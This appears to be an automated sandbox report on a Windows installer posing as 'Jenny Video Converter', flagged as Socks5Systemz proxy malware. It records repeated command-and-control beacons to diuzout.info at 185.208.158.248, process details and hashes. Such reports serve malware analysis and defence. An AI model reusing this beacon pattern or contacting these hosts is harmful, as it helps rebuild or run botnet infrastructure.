Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:45.342981100 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:45.583451033 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 56 | Source: 192.168.2.6:63221 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:45.708553076 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:46.404634953 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:46.514856100 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:46.750746965 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 57 | Source: 192.168.2.6:63222 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:46.879548073 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:47.566320896 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 58 | Source: 192.168.2.6:63223 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:47.710681915 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:48.435113907 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:48.545754910 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:48.785010099 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 59 | Source: 192.168.2.6:63224 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:48.910799026 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:49.610023975 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:49.717539072 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:49.955971003 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 60 | Source: 192.168.2.6:63225 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:50.082608938 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:50.773447037 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 61 | Source: 192.168.2.6:63226 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:50.894640923 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:51.589812994 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Oct 8, 2024 04:14:51.701644897 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:51.936835051 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 62 | Source: 192.168.2.6:63227 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:52.051650047 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:52.757633924 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 63 | Source: 192.168.2.6:63228 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:52.902107954 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:53.599946976 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 64 | Source: 192.168.2.6:63229 | Destination: 185.208.158.248:80 | PID: 2760 | Process: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:53.722630978 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
Host: diuzout.info
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:54.413630009 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 08 Oct 2024 02:14:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 63230 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:54.541883945 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:55.227144003 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.6 | 63231 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:55.360884905 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:56.065834999 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:55 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.6 | 63232 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:56.193598032 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:56.908514977 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:56 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.6 | 63233 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:57.037122011 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:57.773322105 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:57 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.6 | 63234 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:57.897152901 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:58.597233057 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:58 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.6 | 63235 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:58.727169037 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:14:59.415838003 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:14:59 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.6 | 63236 | 185.208.158.248 | 80 | 2760 | C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 04:14:59.542429924 CEST | 327 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
  Host: diuzout.info
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 8, 2024 04:15:00.248508930 CEST | 220 | IN | HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Tue, 08 Oct 2024 02:15:00 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP/7.4.33
  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
  Data Ascii: e67b680813008c20



                                                                              Target ID:0
                                                                              Start time:22:12:54
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\N6jsQ3XNNX.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\N6jsQ3XNNX.exe"
                                                                              Imagebase:0x400000
                                                                              File size:4'512'180 bytes
                                                                              MD5 hash:46D2E28BE5AD34097672B73BFA78E805
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:2
                                                                              Start time:22:12:55
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe"
                                                                              Imagebase:0x400000
                                                                              File size:709'120 bytes
                                                                              MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:22:12:57
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i
                                                                              Imagebase:0x400000
                                                                              File size:3'296'256 bytes
                                                                              MD5 hash:65FDD2B7C5D23EEF202604FCFEFD2FF4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:6
                                                                              Start time:22:13:40
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                              Imagebase:0x7ff7403e0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                                Execution Graph

                                                                                Execution Coverage:21%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:2.4%
                                                                                Total number of Nodes:1498
                                                                                Total number of Limit Nodes:22
InterlockedExchange 6219->6220 6222 407890 6219->6222 6221 4078e7 6220->6221 6661 40294a 6664 402952 6661->6664 6662 403554 4 API calls 6662->6664 6663 402967 6664->6662 6664->6663 6665 403f4a 6666 403f53 6665->6666 6667 403f5c 6665->6667 6669 403f07 6666->6669 6672 403f09 6669->6672 6671 403f3c 6671->6667 6673 403154 4 API calls 6672->6673 6675 403e9c 6672->6675 6679 403f3d 6672->6679 6692 403e9c 6672->6692 6673->6672 6674 403ef2 6677 402674 4 API calls 6674->6677 6675->6671 6675->6674 6678 403ea9 6675->6678 6683 403e8e 6675->6683 6681 403ecf 6677->6681 6678->6681 6682 402674 4 API calls 6678->6682 6679->6667 6681->6667 6682->6681 6684 403e4c 6683->6684 6685 403e62 6684->6685 6686 403e7b 6684->6686 6689 403e67 6684->6689 6688 403cc8 4 API calls 6685->6688 6687 402674 4 API calls 6686->6687 6690 403e78 6687->6690 6688->6689 6689->6690 6691 402674 4 API calls 6689->6691 6690->6674 6690->6678 6691->6690 6693 403ed7 6692->6693 6698 403ea9 6692->6698 6694 403ef2 6693->6694 6695 403e8e 4 API calls 6693->6695 6696 402674 4 API calls 6694->6696 6697 403ee6 6695->6697 6700 403ecf 6696->6700 6697->6694 6697->6698 6699 402674 4 API calls 6698->6699 6698->6700 6699->6700 6700->6672 6709 405150 6710 405163 6709->6710 6711 404e48 19 API calls 6710->6711 6712 405177 6711->6712 6282 403a52 6283 403a74 6282->6283 6284 403a5a WriteFile 6282->6284 6284->6283 6285 403a78 GetLastError 6284->6285 6285->6283 6286 402654 6287 403154 4 API calls 6286->6287 6289 402614 6287->6289 6288 402632 6288->6288 6289->6288 6290 403154 4 API calls 6289->6290 6290->6288 5657 409e62 5658 409aa0 4 API calls 5657->5658 5659 409e67 5658->5659 5660 409e6c 5659->5660 5760 402f24 5659->5760 5694 4098f4 5660->5694 5663 409ec4 5699 4026c4 GetSystemTime 5663->5699 5665 409ec9 5700 409330 5665->5700 5666 409e71 5666->5663 5765 408dd8 5666->5765 5670 4031e8 4 API calls 5672 409ede 5670->5672 5671 409ea0 5674 409ea8 MessageBoxA 5671->5674 5718 406928 5672->5718 5674->5663 5676 409eb5 5674->5676 5768 405854 
